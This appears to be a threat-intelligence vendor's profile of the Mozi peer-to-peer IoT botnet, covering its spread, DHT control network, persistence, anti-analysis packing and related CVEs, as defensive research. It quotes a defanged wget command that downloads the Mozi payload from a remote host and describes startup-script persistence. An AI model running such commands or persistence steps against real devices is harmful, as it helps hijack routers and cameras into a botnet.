Mozi is a peer-to-peer botnet first disclosed in December 2019 that primarily compromises Linux-based IoT and networking devices, including SOHO routers, gateways, digital video recorders, and network video recorders. It incorporates code from earlier botnet families, including Mirai, and has variants for ARM, MIPS, and x86 architectures. Infection occurs through weak or default remote-access credentials, particularly Telnet passwords, and exploitation of device vulnerabilities, including command-injection flaws.
Infected devices join a custom peer-to-peer network built on a BitTorrent-like Distributed Hash Table, receive operator configurations and commands, and attempt to infect additional devices. Compromised nodes can host payloads over HTTP to support propagation; later variants use UPnP port mapping to expose this service through NAT. Mozi supports HTTP, TCP, and UDP DDoS attacks, email spam, brute-force attacks, password spraying, data exfiltration, and command or payload execution. Some variants supplement distributed control with Mirai-style centralized attack coordination. Associated Mozi_ftp and Mozi_ssh nodes extend the network into cryptocurrency mining and propagate through weak FTP and SSH credentials; Mozi_ftp includes a Windows implementation.
Mozi implements device-specific persistence on Netgear, Huawei, and ZTE gateways through startup-script changes and other configuration modifications. It can attempt privilege escalation through CVE-2015-1328, disable remote-management services, change management credentials, and block access ports to retain control. On forwarding-enabled gateways, its traffic-manipulation module can spoof DNS responses and redirect or inject JavaScript into HTTP traffic. UPX-packed samples deliberately corrupt packing metadata to obstruct automated unpacking and analysis. Its decentralized architecture allows surviving nodes to continue propagation despite disruption of individual peers.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
15 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CIRCL lists CVE-2024-13030 as a confirmed exploited vulnerability. Sinkhole evidence records an HNAP1 request containing a SOAPAction command to download and execute Mozi.m.
CVE-2023-1389, a command injection vulnerability in the firmware for the TP-Link Archer AX21 Wi-Fi routers accounts for 40% of malicious scanning activity during April 2024. | Exploit code for this CVE indicates that attackers are using it to take over vulnerable devices and subsume them into the Mozi botnet.
“wget hxxp[://]<ip_address:port>/Mozi[.]m -O /tmp/netgear; - Retrieve malicious script (Mozi botnet related?) from remote server, save it in /tmp directory and name it ‘netgear’.”
It deletes the file /home/httpd/web_shell_cmd.gch. This file can be used to gain access through exploitation of the vulnerability CVE-2014-2321; deleting it prevents future attacks. | Mozi is a peer-to-peer (P2P) botnet that uses a BitTorrent-like network to infect IoT devices such as network gateways and digital video records (DVRs).
A specific check is conducted for the existence of the /overlay folder, and whether the malware does not have write permissions to the folder /etc. In this case, it will try to exploit CVE-2015-1328. Successful exploitation of the vulnerability will grant the malware access to the following folders. | Mozi is a peer-to-peer (P2P) botnet that uses a BitTorrent-like network to infect IoT devices such as network gateways and digital video records (DVRs).
The sample represents a brand new P2P botnet implemented based on the DHT protocol, the last botnet which uses DHT is the Hajime, and we call it Mozi according to the characteristics of its propagation sample file name Mozi.m , Mozi.a . | The vulnerabilities used by Mozi Botnet are shown in the following table: ... CVE-2017-17215 ... Huawei Router HG532
The vulnerabilities used by Mozi Botnet are shown in the following table: ... CVE-2018-10561, CVE-2018-10562 ... GPON Routers | The sample represents a brand new P2P botnet implemented based on the DHT protocol, the last botnet which uses DHT is the Hajime, and we call it Mozi according to the characteristics of its propagation sample file name Mozi.m , Mozi.a .
The sample represents a brand new P2P botnet implemented based on the DHT protocol, the last botnet which uses DHT is the Hajime, and we call it Mozi according to the characteristics of its propagation sample file name Mozi.m , Mozi.a . | The vulnerabilities used by Mozi Botnet are shown in the following table: ... CVE-2018-10561, CVE-2018-10562 ... GPON Routers
The vulnerabilities used by Mozi Botnet are shown in the following table: ... CVE-2014-8361 ... Devices using the Realtek SDK | The sample represents a brand new P2P botnet implemented based on the DHT protocol, the last botnet which uses DHT is the Hajime, and we call it Mozi according to the characteristics of its propagation sample file name Mozi.m , Mozi.a .
Widely known Internet of Things device vulnerabilities including the Spring Cloud Gateway RCE, tracked as CVE-2022-22947, the TBK DVR-4104 and DVR-4216 command injection bug, tracked as CVE-2024-3721, and an MVPower DVR misconfiguration were also abused in botnet attacks.
Widely known Internet of Things device vulnerabilities including the Spring Cloud Gateway RCE, tracked as CVE-2022-22947, the TBK DVR-4104 and DVR-4216 command injection bug, tracked as CVE-2024-3721, and an MVPower DVR misconfiguration were also abused in botnet attacks.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
“...most of the malware samples are from well-known malware families like Mirai, Gafgyt and Mozi.”
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"...alongside NETGEAR-MOZI and other router-related flaws. This pattern suggests that the actor was focused on building or expanding botnets..."
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Bot deployment : this is where the bot is deployed into a target system member of the network, for instance through an exploit... Alternatively, DDG uses exploits against Redis, Nexus Repository Manager and Supervisord... Additionally, a number of exploits affecting IoT devices such as CCTV, DVR, NVR and routers are included as a supplemental infection method.
It places the script file named S95Baby.sh in these folders. The script runs the files /usr/networks or /user/networktmp . It adds the script to /etc/rcS.d and /etc/rc.local in case it lacks privileges.
“the botnet spreads via the use of weak and default remote access passwords for targeted devices”
It places the script file named S95Baby.sh in these folders. The script runs the files /usr/networks or /user/networktmp . It adds the script to /etc/rcS.d and /etc/rc.local in case it lacks privileges.
“the observed anti-analysis technique used by the analyzed Mozi samples consists solely of zeroing out the 8 bytes after the ‘UPX!’ magic bytes.”
“Right away we see that we have a UPX packed ELF binary” and “the p_info section of the file appears to be corrupted.”
“the botnet spreads via the use of weak and default remote access passwords for targeted devices”
Execution of the following commands changes the password and disables the management server for Huawei modem/router devices
Some of the most common modifications include: Rewriting the UPX! magic headers ELF magic bytes are modified Copyright string is modified Section header names are modified Extra junk bytes added throughout the binary
“The Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (... brute-force, password spraying, etc.).”
“The Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (... brute-force, password spraying, etc.).”
Execution of the following commands changes the password and disables the management server for Huawei modem/router devices
The Mozi botnet communicates using a Distributed Hash Table (DHT) which records the contact information for other nodes in the botnet. This is the same serverless mechanism used by file sharing peer-to-peer (P2P) clients.
“The Mozi botnet communicates using a Distributed Hash Table (DHT) which records the contact information for other nodes in the botnet.”
Threat actors use peer-to-peer (P2P) botnets like these to build a platform that can later be used to carry out malicious operations... The need for increased takedown resistance eventually drove botnet operators to adapt and explore peer-to-peer approaches. | The Mozi malware family makes use of a custom P2P protocol built on top of Distributed Hash Tables (DHT) in order to build a network of infected nodes.
87 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
44 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Peer-to-peer IoT botnet used for DDoS attacks and payload delivery. The article reports that its activity collapsed following an apparent kill-switch update in 2023.
A Mirai-derived peer-to-peer botnet targeting IoT devices across multiple CPU architectures, propagating via direct-to-IP communications and embedding exploitation payloads directly in HTTP requests.
Botnet malware observed among families associated with the mapped C2 infrastructure.
An IoT botnet associated with abuse of compromised routers and embedded devices.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.